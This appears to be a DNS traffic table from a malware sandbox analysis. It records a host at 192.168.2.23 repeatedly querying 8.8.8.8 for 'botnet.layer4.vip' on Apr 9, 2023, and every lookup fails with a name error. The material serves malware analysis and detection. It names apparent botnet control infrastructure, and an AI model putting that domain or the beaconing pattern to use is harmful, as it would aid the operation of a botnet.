                                  Apr 9, 2023 03:30:28.840344906 CEST8.8.8.8192.168.2.230x6af1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:28.864375114 CEST8.8.8.8192.168.2.230x6af1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:28.880647898 CEST8.8.8.8192.168.2.230x6af1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:28.896318913 CEST8.8.8.8192.168.2.230x6af1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:28.912441015 CEST8.8.8.8192.168.2.230x3ed0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:28.928682089 CEST8.8.8.8192.168.2.230x3ed0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:28.944659948 CEST8.8.8.8192.168.2.230x3ed0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:28.968777895 CEST8.8.8.8192.168.2.230x3ed0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:28.993304968 CEST8.8.8.8192.168.2.230x3ed0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.009701967 CEST8.8.8.8192.168.2.230x2da7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.033889055 CEST8.8.8.8192.168.2.230x2da7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.058346987 CEST8.8.8.8192.168.2.230x2da7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.074362040 CEST8.8.8.8192.168.2.230x2da7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.098954916 CEST8.8.8.8192.168.2.230x2da7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.114732981 CEST8.8.8.8192.168.2.230xad34Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.130393982 CEST8.8.8.8192.168.2.230xad34Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.154957056 CEST8.8.8.8192.168.2.230xad34Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.170991898 CEST8.8.8.8192.168.2.230xad34Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.195193052 CEST8.8.8.8192.168.2.230xad34Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.219734907 CEST8.8.8.8192.168.2.230xc189Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.235460043 CEST8.8.8.8192.168.2.230xc189Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.264421940 CEST8.8.8.8192.168.2.230xc189Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.279966116 CEST8.8.8.8192.168.2.230xc189Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.304819107 CEST8.8.8.8192.168.2.230xc189Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.320637941 CEST8.8.8.8192.168.2.230xa8b2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.346108913 CEST8.8.8.8192.168.2.230xa8b2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.362363100 CEST8.8.8.8192.168.2.230xa8b2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.378197908 CEST8.8.8.8192.168.2.230xa8b2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.393852949 CEST8.8.8.8192.168.2.230xa8b2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.409722090 CEST8.8.8.8192.168.2.230x2192Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.434298992 CEST8.8.8.8192.168.2.230x2192Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.450297117 CEST8.8.8.8192.168.2.230x2192Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.466325045 CEST8.8.8.8192.168.2.230x2192Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.490634918 CEST8.8.8.8192.168.2.230x2192Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.506761074 CEST8.8.8.8192.168.2.230xf83bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.522397041 CEST8.8.8.8192.168.2.230xf83bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.546715975 CEST8.8.8.8192.168.2.230xf83bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.562505960 CEST8.8.8.8192.168.2.230xf83bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.586827993 CEST8.8.8.8192.168.2.230xf83bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.611464977 CEST8.8.8.8192.168.2.230xda54Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.627474070 CEST8.8.8.8192.168.2.230xda54Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.643451929 CEST8.8.8.8192.168.2.230xda54Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.659542084 CEST8.8.8.8192.168.2.230xda54Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.684200048 CEST8.8.8.8192.168.2.230xda54Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.708775997 CEST8.8.8.8192.168.2.230xa58aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.724651098 CEST8.8.8.8192.168.2.230xa58aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.749044895 CEST8.8.8.8192.168.2.230xa58aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.764853954 CEST8.8.8.8192.168.2.230xa58aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.789309978 CEST8.8.8.8192.168.2.230xa58aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.813929081 CEST8.8.8.8192.168.2.230xdebeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.838208914 CEST8.8.8.8192.168.2.230xdebeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.862654924 CEST8.8.8.8192.168.2.230xdebeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.878437042 CEST8.8.8.8192.168.2.230xdebeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.902729034 CEST8.8.8.8192.168.2.230xdebeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.918407917 CEST8.8.8.8192.168.2.230xf254Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.942805052 CEST8.8.8.8192.168.2.230xf254Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.967073917 CEST8.8.8.8192.168.2.230xf254Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.983072042 CEST8.8.8.8192.168.2.230xf254Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.999097109 CEST8.8.8.8192.168.2.230xf254Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.015188932 CEST8.8.8.8192.168.2.230x3c21Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.039745092 CEST8.8.8.8192.168.2.230x3c21Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.063971996 CEST8.8.8.8192.168.2.230x3c21Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.088871956 CEST8.8.8.8192.168.2.230x3c21Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.104454994 CEST8.8.8.8192.168.2.230x3c21Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.128803968 CEST8.8.8.8192.168.2.230x7fbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.154068947 CEST8.8.8.8192.168.2.230x7fbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.170506954 CEST8.8.8.8192.168.2.230x7fbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.194638014 CEST8.8.8.8192.168.2.230x7fbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.218908072 CEST8.8.8.8192.168.2.230x7fbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.243599892 CEST8.8.8.8192.168.2.230xbf68Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.259587049 CEST8.8.8.8192.168.2.230xbf68Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.275187016 CEST8.8.8.8192.168.2.230xbf68Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.305171013 CEST8.8.8.8192.168.2.230xbf68Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.329622030 CEST8.8.8.8192.168.2.230xbf68Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.345557928 CEST8.8.8.8192.168.2.230xc1d1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.369705915 CEST8.8.8.8192.168.2.230xc1d1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.385715961 CEST8.8.8.8192.168.2.230xc1d1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.409934998 CEST8.8.8.8192.168.2.230xc1d1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.425520897 CEST8.8.8.8192.168.2.230xc1d1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.441579103 CEST8.8.8.8192.168.2.230x4b3fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.466533899 CEST8.8.8.8192.168.2.230x4b3fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.482434034 CEST8.8.8.8192.168.2.230x4b3fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.497936964 CEST8.8.8.8192.168.2.230x4b3fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.513878107 CEST8.8.8.8192.168.2.230x4b3fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.538513899 CEST8.8.8.8192.168.2.230x9dfbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.562719107 CEST8.8.8.8192.168.2.230x9dfbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.607645988 CEST8.8.8.8192.168.2.230x9dfbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.631700993 CEST8.8.8.8192.168.2.230x9dfbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.647624016 CEST8.8.8.8192.168.2.230x9dfbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.663628101 CEST8.8.8.8192.168.2.230x3b56Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.679105997 CEST8.8.8.8192.168.2.230x3b56Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.694629908 CEST8.8.8.8192.168.2.230x3b56Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.721188068 CEST8.8.8.8192.168.2.230x3b56Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.736710072 CEST8.8.8.8192.168.2.230x3b56Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.761096001 CEST8.8.8.8192.168.2.230xb896Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.776518106 CEST8.8.8.8192.168.2.230xb896Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.800864935 CEST8.8.8.8192.168.2.230xb896Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.825186014 CEST8.8.8.8192.168.2.230xb896Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.841037035 CEST8.8.8.8192.168.2.230xb896Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.865180969 CEST8.8.8.8192.168.2.230x7060Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.881165981 CEST8.8.8.8192.168.2.230x7060Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.905296087 CEST8.8.8.8192.168.2.230x7060Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.921231985 CEST8.8.8.8192.168.2.230x7060Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.936789989 CEST8.8.8.8192.168.2.230x7060Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.961102962 CEST8.8.8.8192.168.2.230xe00fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.976816893 CEST8.8.8.8192.168.2.230xe00fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.992947102 CEST8.8.8.8192.168.2.230xe00fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.008945942 CEST8.8.8.8192.168.2.230xe00fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.033006907 CEST8.8.8.8192.168.2.230xe00fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.057579994 CEST8.8.8.8192.168.2.230x3995Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.073590040 CEST8.8.8.8192.168.2.230x3995Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.090523958 CEST8.8.8.8192.168.2.230x3995Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.115205050 CEST8.8.8.8192.168.2.230x3995Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.132025957 CEST8.8.8.8192.168.2.230x3995Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.148010015 CEST8.8.8.8192.168.2.230x25ccName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.172920942 CEST8.8.8.8192.168.2.230x25ccName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.188709974 CEST8.8.8.8192.168.2.230x25ccName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.212928057 CEST8.8.8.8192.168.2.230x25ccName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.237607956 CEST8.8.8.8192.168.2.230x25ccName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.254342079 CEST8.8.8.8192.168.2.230xbaaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.270855904 CEST8.8.8.8192.168.2.230xbaaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.286881924 CEST8.8.8.8192.168.2.230xbaaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.311628103 CEST8.8.8.8192.168.2.230xbaaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.336194992 CEST8.8.8.8192.168.2.230xbaaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.352333069 CEST8.8.8.8192.168.2.230x9aa9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.377187014 CEST8.8.8.8192.168.2.230x9aa9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.393143892 CEST8.8.8.8192.168.2.230x9aa9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.409024954 CEST8.8.8.8192.168.2.230x9aa9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.425499916 CEST8.8.8.8192.168.2.230x9aa9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.450186968 CEST8.8.8.8192.168.2.230xddb9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.466722012 CEST8.8.8.8192.168.2.230xddb9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.482882977 CEST8.8.8.8192.168.2.230xddb9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.498744011 CEST8.8.8.8192.168.2.230xddb9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.514352083 CEST8.8.8.8192.168.2.230xddb9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.530524969 CEST8.8.8.8192.168.2.230xd756Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.552710056 CEST8.8.8.8192.168.2.230xd756Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.577981949 CEST8.8.8.8192.168.2.230xd756Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.602525949 CEST8.8.8.8192.168.2.230xd756Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.618067980 CEST8.8.8.8192.168.2.230xd756Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.634385109 CEST8.8.8.8192.168.2.230x24cdName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.650873899 CEST8.8.8.8192.168.2.230x24cdName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.667326927 CEST8.8.8.8192.168.2.230x24cdName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.683690071 CEST8.8.8.8192.168.2.230x24cdName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.707963943 CEST8.8.8.8192.168.2.230x24cdName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.727433920 CEST8.8.8.8192.168.2.230x79b0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.752837896 CEST8.8.8.8192.168.2.230x79b0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.768562078 CEST8.8.8.8192.168.2.230x79b0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.784223080 CEST8.8.8.8192.168.2.230x79b0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.808563948 CEST8.8.8.8192.168.2.230x79b0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.833381891 CEST8.8.8.8192.168.2.230x7829Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.849060059 CEST8.8.8.8192.168.2.230x7829Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.873306036 CEST8.8.8.8192.168.2.230x7829Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.889588118 CEST8.8.8.8192.168.2.230x7829Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.905440092 CEST8.8.8.8192.168.2.230x7829Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.921030998 CEST8.8.8.8192.168.2.230x29a2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.945554972 CEST8.8.8.8192.168.2.230x29a2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.962028027 CEST8.8.8.8192.168.2.230x29a2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.977896929 CEST8.8.8.8192.168.2.230x29a2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.001919031 CEST8.8.8.8192.168.2.230x29a2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.017827034 CEST8.8.8.8192.168.2.230x8e35Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.033312082 CEST8.8.8.8192.168.2.230x8e35Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.049067020 CEST8.8.8.8192.168.2.230x8e35Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.073493958 CEST8.8.8.8192.168.2.230x8e35Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.098017931 CEST8.8.8.8192.168.2.230x8e35Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.113673925 CEST8.8.8.8192.168.2.230x756fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.137938023 CEST8.8.8.8192.168.2.230x756fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.161967039 CEST8.8.8.8192.168.2.230x756fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.185964108 CEST8.8.8.8192.168.2.230x756fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.209939003 CEST8.8.8.8192.168.2.230x756fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.225640059 CEST8.8.8.8192.168.2.230xfda4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.241204023 CEST8.8.8.8192.168.2.230xfda4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.265635014 CEST8.8.8.8192.168.2.230xfda4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.290013075 CEST8.8.8.8192.168.2.230xfda4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.314511061 CEST8.8.8.8192.168.2.230xfda4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.338772058 CEST8.8.8.8192.168.2.230xe96bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.354370117 CEST8.8.8.8192.168.2.230xe96bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.378834963 CEST8.8.8.8192.168.2.230xe96bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.394782066 CEST8.8.8.8192.168.2.230xe96bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.418929100 CEST8.8.8.8192.168.2.230xe96bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.434664965 CEST8.8.8.8192.168.2.230x3b59Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.450628996 CEST8.8.8.8192.168.2.230x3b59Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.475225925 CEST8.8.8.8192.168.2.230x3b59Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.499466896 CEST8.8.8.8192.168.2.230x3b59Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.523863077 CEST8.8.8.8192.168.2.230x3b59Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.548091888 CEST8.8.8.8192.168.2.230x9817Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.572303057 CEST8.8.8.8192.168.2.230x9817Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
